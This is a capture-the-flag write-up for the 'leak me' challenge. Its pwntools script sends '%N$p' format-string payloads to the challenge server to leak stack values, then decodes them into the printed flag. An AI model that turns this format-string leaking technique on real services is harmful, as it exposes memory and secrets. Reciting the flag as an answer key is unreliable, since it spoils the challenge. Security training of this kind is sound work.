leak me

Im hiding something in my memory , can u figure out how to see it ?

nc tcp.espark.tn 6050

Author: 4n7h4r4x

Files

main.c

Description: Format string vulnerability to leak flag from stack.

Solution: The flag is stored as a local variable on the stack. We can leak it using format string specifiers:

from pwn import *

host = "tcp.espark.tn"
port = 6050

# Leak stack positions 6-10 which contain the flag
for i in range(6, 11):
    conn = remote(host, port)
    conn.recvuntil(b"format strings\n")
    
    payload = f"%{i}$p.".encode()
    conn.send(payload)
    
    response = conn.recvall(timeout=1).decode()
    print(f"Position {i}: {response}")
    conn.close()

# Hex values at positions 6-10:
hex_values = [
    0x30667b6b72617053,  # Spark{f0
    0x7274735f37346d72,  # rm47_str
    0x3372345f35676e31,  # 1ng5_4r3
    0x676e317a346d345f,  # _4m4z1ng
    0x7d,                 # }
]

# Decode little-endian
flag = ""
for val in hex_values:
    bytes_val = []
    temp = val
    while temp > 0:
        bytes_val.append(chr(temp & 0xFF))
        temp >>= 8
    flag += ''.join(bytes_val)

print(flag)  # Spark{f0rm47_str1ng5_4r3_4m4z1ng}

Previousbaby bof NextCryptography

Last updated 12 days ago

Was this helpful?